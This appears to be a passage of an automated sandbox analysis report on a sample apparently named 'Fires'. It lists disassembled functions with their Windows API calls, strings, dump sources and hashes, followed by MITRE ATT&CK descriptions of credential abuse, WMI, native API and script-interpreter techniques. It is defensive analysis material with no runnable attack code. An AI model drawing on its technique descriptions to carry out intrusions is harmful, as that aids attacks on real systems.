Instruction Fuzzy Hash: BE218030601244AFCB26AF7CCC4ADB93B66EF46360F584244F6295B2E2C7719E56D730

Function 00DD41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D478B1
Part of subcall function 00D47873: GetStockObject.GDI32(00000011), ref: 00D478C5
Part of subcall function 00D47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D478CF

GetWindowRect.USER32(00000000,?), ref: 00DD4216
GetSysColor.USER32(00000012), ref: 00DD4230

Strings

static, xrefs: 00DD41F3

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: fd86850c80b3cdfb59e51eb4caca3825d724426f7f10212ceb3b5399105af5ca
Instruction ID: c9361d132ef44eb54dc646dc0c5d5cc5017c22daebd88fce53ea7bdb2700b438
Opcode Fuzzy Hash: fd86850c80b3cdfb59e51eb4caca3825d724426f7f10212ceb3b5399105af5ca
Instruction Fuzzy Hash: 67112672610209AFDF01DFA8CC45AEA7BB8EB08314F054526F955E3250D634E8509B60

Function 00DBD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DBD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DBD7EB

Strings

<local>, xrefs: 00DBD7AB

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 312632d7beeaf5d648967197beba9a95397a00a9be9b1b894b2afbbba6d3e84b
Instruction ID: f2d8bbd66a9a6eaa8d3227c5ad8714e0d306453cdd42866edfdae5a52b1687f3
Opcode Fuzzy Hash: 312632d7beeaf5d648967197beba9a95397a00a9be9b1b894b2afbbba6d3e84b
Instruction Fuzzy Hash: 6F11E971616632FAD7344F668C45EF7BF5EEB127A4F10422AF54BD3180EA649840D6F0

Function 00DA75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

CharUpperBuffW.USER32(?,?,?), ref: 00DA761D
_wcslen.LIBCMT ref: 00DA7629

Strings

STOP, xrefs: 00DA7623, 00DA7628

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: b6dd0b19eba7fb3a6fccbb6b51fed860d84b704a8c6db740b709703b72f65759
Instruction ID: b1ce035ef9aa347701673d3318d0a3549543e2c12a02903a3867c0232ca91d77
Opcode Fuzzy Hash: b6dd0b19eba7fb3a6fccbb6b51fed860d84b704a8c6db740b709703b72f65759
Instruction Fuzzy Hash: C601C432A149278BCB509EBDDC44ABF73B5BF627507580525E421D6291EB31D900D670

Function 00DA262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DA2699

Strings

ListBox, xrefs: 00DA2663
ComboBox, xrefs: 00DA2638

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e5e6c3869dce41f247a8ffecbcc5f59f3f5c101d0b1ab76446bd41f84e493778
Instruction ID: 5165856920f5323a6b82002350c7678f1ff8e4f80e0408e7be0319eb185b2263
Opcode Fuzzy Hash: e5e6c3869dce41f247a8ffecbcc5f59f3f5c101d0b1ab76446bd41f84e493778
Instruction Fuzzy Hash: 0A017975A022146BCB04AB65CC55DFE7774EF56360B44061AE472972D1DB719408CA70

Function 00DA2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00DA2593

Strings

ListBox, xrefs: 00DA255D
ComboBox, xrefs: 00DA2532

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f3eb700a6b174d68bae33a0a42b10e04eb97755bb4a7bf27fb6db9dfc59ad1ed
Instruction ID: 84515ead232a1048a80cadf88cd0be319060111216f6841bd23acaf45f187958
Opcode Fuzzy Hash: f3eb700a6b174d68bae33a0a42b10e04eb97755bb4a7bf27fb6db9dfc59ad1ed
Instruction Fuzzy Hash: 8E01A775E411046BCF04EB95C966EFE77A8EF56340F54002AB803A72C1DB50DE08DAB1

Function 00DA25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00DA2615

Strings

ListBox, xrefs: 00DA25E1
ComboBox, xrefs: 00DA25B6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4aad5b13613125daf89104d92cc1807796921365ccc074d20bd86d6c304fbe36
Instruction ID: 854f3442d48fbb6042b4287d7cb9c49bfd3a98034a32d1b75667de3972301ca3
Opcode Fuzzy Hash: 4aad5b13613125daf89104d92cc1807796921365ccc074d20bd86d6c304fbe36
Instruction Fuzzy Hash: DF01A275E4110467CB15EBA5D901FFE77B8DF26350F581026B802B3281DB61CE08DAB2

Function 00DA26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DA2720

Strings

ListBox, xrefs: 00DA26ED
ComboBox, xrefs: 00DA26C2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: de0cf37d343feadd77891b4e484c964385ffcf8699988ecda6a5b7f15b04ac95
Instruction ID: d99cb298857f38c43471c188263b4d2fcd48d952f74ff3a94b4ccf40cc9aa2be
Opcode Fuzzy Hash: de0cf37d343feadd77891b4e484c964385ffcf8699988ecda6a5b7f15b04ac95
Instruction Fuzzy Hash: 87F0F475E4121467CB04A7A88C42FFE737CEF12760F440926F462A32C1DB609908CA70

Function 00DD9AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00DD9B6D

Part of subcall function 00D42234: GetWindowLongW.USER32(?,000000EB), ref: 00D42242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DD9B53

Strings

(, xrefs: 00DD9B06

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (
API String ID: 982171247-2063206799
Opcode ID: bef5f9eced8ba37a280b503b1c86d7170af0e6af3834c42d563854a5cf2c2e8b
Instruction ID: f88700b8505a470c3f4490aefeb3b3fba501f12b5ee304ef6bc897a2c4dc9979
Opcode Fuzzy Hash: bef5f9eced8ba37a280b503b1c86d7170af0e6af3834c42d563854a5cf2c2e8b
Instruction Fuzzy Hash: B801D430201314AFCB259F24EC94FA67B66FB85365F11055BFA461A2E0C7726815DB70

Function 00DD8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

GetWindowLongW.USER32(?,000000F0), ref: 00DD8471
GetWindowLongW.USER32(?,000000EC), ref: 00DD847F

Strings

(, xrefs: 00DD843E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LongWindow
String ID: (
API String ID: 1378638983-2063206799
Opcode ID: 5bcb7c68475b3c1302626d79aae56e6cbe80f85de88520bef5a0ab309c41e9ce
Instruction ID: bd68c87204b5262a6e60c778adbfd6550b82074842afc6bdc11ecb5967cd8ae2
Opcode Fuzzy Hash: 5bcb7c68475b3c1302626d79aae56e6cbe80f85de88520bef5a0ab309c41e9ce
Instruction Fuzzy Hash: B5F06231501285DFCB05DF69DC44DAA77A6FB86320B10862EFA26D73F0CB309810EB60

Function 00DA1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DA146F

Strings

Error allocating memory., xrefs: 00DA1468
AutoIt, xrefs: 00DA1463

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 39bfadf5117a1ec20a59e77aa30e4f608ef070e26cc983271fe9644bbc78f67e
Instruction ID: 2382778eca93624f0f85dc75f371dce394779d777a70d5e0b9a7b31aa0edc833
Opcode Fuzzy Hash: 39bfadf5117a1ec20a59e77aa30e4f608ef070e26cc983271fe9644bbc78f67e
Instruction Fuzzy Hash: E5E048312847183BD6143798BC03F897B89CF0AB51F15481BF788A55C2CEE7649056F9

Function 00D610B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D5FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D610E2,?,?,?,00D4100A), ref: 00D5FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00D4100A), ref: 00D610E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D4100A), ref: 00D610F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D610F0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 020a69c58edc756f16b7979318ba9b9b384ed0b3518d9fa0dc4f6e1912c43038
Instruction ID: 56aaa1444502a7e5b020b13b32600f963a6dde1089d9a7215d3b1bb3309fd501
Opcode Fuzzy Hash: 020a69c58edc756f16b7979318ba9b9b384ed0b3518d9fa0dc4f6e1912c43038
Instruction Fuzzy Hash: 44E06D746003918FD720AF35E805342BFE4EB00705F08892DE885C6351DBB4D488CBB1

Function 00D5F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D5F151

Strings

`5, xrefs: 00D5F131
h5, xrefs: 00D5F146

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5$h5
API String ID: 1385522511-2563461917
Opcode ID: 4b13d5e022435f4f606014be4167e5d54216cb4025549bda7086003591759dac
Instruction ID: d797ccde244c2c783ad1d5e713e363eaa7e0267d6ae279a42d93b77a3bb76982
Opcode Fuzzy Hash: 4b13d5e022435f4f606014be4167e5d54216cb4025549bda7086003591759dac
Instruction Fuzzy Hash: D9E026B1404E14CFCE00DB3CE842DC833B2EB45B21B304174ED23AB2D1CB202A8ACA34

Function 00DB39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DB39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DB3A05

Strings

aut, xrefs: 00DB39F9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 6ebfdb9e86841dcd8406bcabe1888698e9d8ba5be4ea642e7dc106e00153fba5
Instruction ID: 994210aa4fe5941a06f4b6da10188bab2a4bc461b289a32eda06c400a8218f8a
Opcode Fuzzy Hash: 6ebfdb9e86841dcd8406bcabe1888698e9d8ba5be4ea642e7dc106e00153fba5
Instruction Fuzzy Hash: 7ED05B7150131477DE2097549C0DFCB7F6CDB45710F000191BA95D11D1DAF0D585C7A4

Function 00DD2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD2E08
PostMessageW.USER32(00000000), ref: 00DD2E0F

Part of subcall function 00DAF292: Sleep.KERNEL32 ref: 00DAF30A

Strings

Shell_TrayWnd, xrefs: 00DD2E01

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6168ddabd20df85ad5a318567e2120be93fbccfb0fd0321f3fe98a4577180370
Instruction ID: 10216c57f7caf53ed2f07ec55dde70a070848e4220e5d63ea586ac0d88b0f2b0
Opcode Fuzzy Hash: 6168ddabd20df85ad5a318567e2120be93fbccfb0fd0321f3fe98a4577180370
Instruction Fuzzy Hash: 2BD0A9313823006AEA24A7B0AC0BFC23B149B01B00F1008627245EA2C0C8A0A80086A8

Function 00DD2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DD2DDB

Part of subcall function 00DAF292: Sleep.KERNEL32 ref: 00DAF30A

Strings

Shell_TrayWnd, xrefs: 00DD2DC1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 90cc6217b4e42e03ef80d2f3f33e8c7a12651336735cf9186d09231401d2a1ec
Instruction ID: 731c080c0ef51f44f8dc33c9d60d19631cb56e03110af76e5880b1e9e198d580
Opcode Fuzzy Hash: 90cc6217b4e42e03ef80d2f3f33e8c7a12651336735cf9186d09231401d2a1ec
Instruction Fuzzy Hash: 9BD02235386300BBEA24F7B0AC0FFD23B14DF00B00F1008627349EA2C0C8E0A800C6B4

Function 00D7C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D7C213
GetLastError.KERNEL32 ref: 00D7C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D7C27C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 33c3556fa32de9b1b30b416579d53280526a9aa3a217a2f14714a1f9e6e53a9f
Instruction ID: f565e06bd82c69b68cc6dafb14d048341567c0fb385d0d4e952d5c80326d2217
Opcode Fuzzy Hash: 33c3556fa32de9b1b30b416579d53280526a9aa3a217a2f14714a1f9e6e53a9f
Instruction Fuzzy Hash: FC41D530611615AFDB218FE5C844AAA7BA5EF15710F28D16DE85DAB2A2FB308D01CB74

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

